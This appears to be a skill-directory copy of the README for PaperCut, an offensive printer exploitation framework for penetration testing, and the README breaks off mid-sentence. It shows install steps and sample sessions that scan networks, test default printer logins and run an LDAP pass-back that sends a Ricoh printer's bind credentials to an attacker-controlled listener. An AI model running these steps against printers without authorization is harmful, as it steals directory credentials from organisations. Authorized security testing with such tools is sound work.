SkillAgentSearch skills...

PaperCut

Printer exploitation framework for penetration testing. Discovers printers via PJL scanning, checks for default credentials, and extracts stored credentials through pass-back attacks and protocol-level exploits.

GenerateConvertImprove

Install / Use

/learn @waffl3ss/PaperCut
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

PaperCut

Printer exploitation framework for penetration testing. Discovers printers via PJL scanning, checks for default credentials, and extracts stored credentials through pass-back attacks and protocol-level exploits.

The framework and core modules are complete, but community support is needed to expand coverage since writing and testing modules requires access to the actual devices. Please give it a star to help increase visibility for potential module contributions!

    $$$$$$$\                                          $$$$$$\              $$\
    $$  __$$\                                        $$  __$$\             $$ |
    $$ |  $$ |$$$$$$\   $$$$$$\   $$$$$$\   $$$$$$\  $$ /  \__|$$\   $$\ $$$$$$\
    $$$$$$$  |\____$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$ |      $$ |  $$ |\_$$  _|
    $$  ____/ $$$$$$$ |$$ /  $$ |$$$$$$$$ |$$ |  \__|$$ |      $$ |  $$ |  $$ |
    $$ |     $$  __$$ |$$ |  $$ |$$   ____|$$ |      $$ |  $$\ $$ |  $$ |  $$ |$$\
    $$ |     \$$$$$$$ |$$$$$$$  |\$$$$$$$\ $$ |      \$$$$$$  |\$$$$$$  |  \$$$$  |
    \__|      \_______|$$  ____/  \_______|\__|       \______/  \______/    \____/
                       $$ |
                       $$ |    Printer Exploitation Framework
                       \__|    #Waffl3ss                 v0.7
  Type 'help' for available commands. Tab completion is available.

PaperCut > workspace create DEMO
[+] Workspace "DEMO" created and set as active
PaperCut [DEMO] > scan -t 10.0.0.10
[*] Scanning 1 target(s) with 20 workers (timeout: 2s)
[+] 10.0.0.10 -- RICOH MP C3004 (Ricoh)

[*] Scan complete. Found 1 printer(s) out of 1 target(s).
PaperCut [DEMO] > use ricoh/ldap/passback
[*] Using module: ricoh/ldap/passback
[*] RICOH LDAP Pass-Back - redirects LDAP test connection to capture bind credentials
[*] Category: SAFE | Manufacturer: Ricoh
[*] Models: MP C3003, MP C4503, MP C6003
PaperCut [DEMO] (ricoh/ldap/passback) SAFE >

Legal Disclaimer: PaperCut is designed for authorized security testing and educational purposes only. Only use this tool against systems you own or have explicit written authorization to test. Unauthorized access to computer systems is illegal. The authors assume no liability for misuse of this software.

Table of Contents

Installation

Requires Go 1.24+.

git clone https://github.com/waffl3ss/PaperCut.git
cd PaperCut

# Build for current OS
make build

# Build for specific platforms
make linux       # papercut_linux
make windows     # papercut_windows.exe
make darwin      # papercut_darwin (amd64)
make darwin-arm  # papercut_darwin_arm64 (Apple Silicon)

# Build all platforms
make all

Quick Start

# Launch interactive shell
./papercut

# Create a workspace and scan a network
papercut > workspace create engagement1
papercut [engagement1] > scan -t 10.0.0.0/24

# View results and search for modules
papercut [engagement1] > results
papercut [engagement1] > search ricoh

# Select a module and exploit
papercut [engagement1] > use 1
papercut [engagement1] (ricoh/ldap/passback) > set TARGET 1
papercut [engagement1] (ricoh/ldap/passback) > set LHOST 10.0.0.100
papercut [engagement1] (ricoh/ldap/passback) > check
papercut [engagement1] (ricoh/ldap/passback) > run

# View captured credentials
papercut [engagement1] > creds

Usage

Interactive Mode

./papercut

Launches the interactive shell with tab completion, command history, and a Metasploit-style workflow.

papercut > workspace create engagement1
[+] Workspace "engagement1" created and set as active

papercut [engagement1] > scan -t 10.0.0.0/24
[*] Scanning 254 target(s) with 20 workers (timeout: 2s)
[+] 10.0.0.5 -- RICOH MP C3004 (Ricoh)
[+] 10.0.0.12 -- HP LaserJet Pro M404dn (HP)
[+] 10.0.0.20 -- Sharp MX-2640N (Sharp)

papercut [engagement1] > results
papercut [engagement1] > results --manufacturer ricoh
papercut [engagement1] > search ricoh
papercut [engagement1] > set threads 100
papercut [engagement1] > show

Module Workflow

Select a module, configure options, then check credentials or run the exploit:

papercut [engagement1] > search ricoh
╭───┬──────────────────────┬──────────┬──────────────┬─────────────────────┬──────────────────────╮
│ # │ Name                 │ Category │ Manufacturer │ Models              │ Description          │
├───┼──────────────────────┼──────────┼──────────────┼─────────────────────┼──────────────────────┤
│ 1 │ ricoh/ldap/passback  │ SAFE     │ Ricoh        │ MP C3003, MP C4503  │ RICOH LDAP Pass-Back │
╰───┴──────────────────────┴──────────┴──────────────┴─────────────────────┴──────────────────────╯

papercut [engagement1] > use 1
[*] Using module: ricoh/ldap/passback

papercut [engagement1] (ricoh/ldap/passback) > options
╭──────────┬─────────┬──────────┬────────────────────────────────────╮
│ NAME     │ CURRENT │ REQUIRED │ DESCRIPTION                        │
├──────────┼─────────┼──────────┼────────────────────────────────────┤
│ RHOST    │         │ yes      │ Target IP address                  │
│ RPORT    │ 80      │ no       │ Target HTTP port                   │
│ LHOST    │         │ yes      │ Listening IP for LDAP callback     │
│ LPORT    │ 389     │ no       │ Listening port for LDAP callback   │
│ USERNAME │ admin   │ no       │ Login username                     │
│ PASSWORD │         │ no       │ Login password (empty for default) │
│ SSL      │ false   │ no       │ Use HTTPS                          │
│ VERBOSE  │ false   │ no       │ Verbose output                     │
│ TIMEOUT  │ 120     │ no       │ Callback timeout in seconds        │
│ PROXY    │         │ no       │ Proxy (overrides global)           │
╰──────────┴─────────┴──────────┴────────────────────────────────────╯

papercut [engagement1] (ricoh/ldap/passback) > set TARGET 1
[*] TARGET 1 => 10.0.0.5 (Ricoh RICOH MP C3004)

papercut [engagement1] (ricoh/ldap/passback) > set LHOST 10.0.0.100

papercut [engagement1] (ricoh/ldap/passback) > check
[*] Checking default credentials on 10.0.0.5:80...
[+] Default credentials valid: admin/(empty)

papercut [engagement1] (ricoh/ldap/passback) > run
[*] Logging into 10.0.0.5:80 as admin...
[+] Login successful
[*] Extracting LDAP configuration...
[*] Starting LDAP listener on 10.0.0.100:389...
[*] Redirecting LDAP test to 10.0.0.100:389...
[*] Waiting for callback (timeout: 120s)...
[+] Received LDAP bind from 10.0.0.5
[+] Username: cn=ldap_user,dc=corp,dc=local
[+] Password: LdapP@ssw0rd!

papercut [engagement1] (ricoh/ldap/passback) > back

When a module is active:

  • UPPERCASE option names set module options: set RHOST 10.0.0.5
  • lowercase option names set global settings: set threads 50
  • set TARGET <n> fills RHOST from the scan results table row number

One-Shot CLI Mode

Most commands also work as direct CLI invocations with flags. The interactive shell is the primary interface and is more thoroughly tested - one-shot mode is provided as a convenience but may not cover all workflows.

./papercut scan -t 10.0.0.0/24 -w engagement1
./papercut check -t 10.0.0.5 -m ricoh/ldap/passback -w engagement1
./papercut results -w engagement1

Target Input Formats

The -t flag accepts:

  • Single IP: 10.0.0.1
  • CIDR notation: 10.0.0.0/24, 172.16.0.0/16, 10.0.0.0/8
  • File: path to a text file with one target per line (supports IPs, CIDRs, and hostnames)
  • Hostname: printer.corp.local

Interactive Commands

| Command | Description | |---|---| | scan -t <target> | Scan targets via PJL on port 9100 | | search <term> | Search modules (case-insensitive, searches name/description/manufacturer/models) | | use <module\|number> | Select a module by name or search result number | | options | Show options for the active module | | set <OPTION> <value> | Set module option (when module active) | | set TARGET <n> | Set RHOST from results table row number | | check | Test default credentials (module context) | | run | Execute the active module's exploit | | back | Deselect the current module | | results | Show scan results for active workspace | | results --manufacturer <name> | Filter results by manufacturer | | results -c | Show only hosts with confirmed default credentials | | creds | Show captured credentials from exploits | | workspace create <name> | Create a new workspace | | workspace use <name> | Switch to a workspace | | workspace list | List all workspaces | | workspace delete <name> | Delete a workspace and its data | | workspace info | Show active workspace details | | set <option> <value> | Set global: threads, timeout, rate, proxy | | show | Show current global settings | | banner | Display the banner | | clear | Clear the screen | | help | Show help | | exit / quit | Exit |

Settings

| Option | Default | Description | |---|---|---| | threads | 20 | Number of concurrent worker goroutines | | timeout | 2s | TCP connection timeout per host | | rate | 0 (unlimited) | Max new connections per second | | proxy | (none) | SOCKS proxy for connections (socks5://host:port) |

Modules

Modules are categorized as SAFE or UNSAFE:

  • SAFE - Restores the device to its original state after execution. Read-only extraction, test connections, and temporary config changes that are reverted.
  • UNSAFE - May leave changes on the device. Settings are modified during exploitation and restored on a best-effort basis.

Each module has two phases:

  • Check - Tests for default credentials or vulnerable c

waffl3ss

View profile

View on GitHub
GitHub Stars20
CategoryDevelopment
Updated2d ago
Forks0
waffl3ss/PaperCut

Languages

Go

Security Score

90/100

Audited on Apr 5, 2026

No findings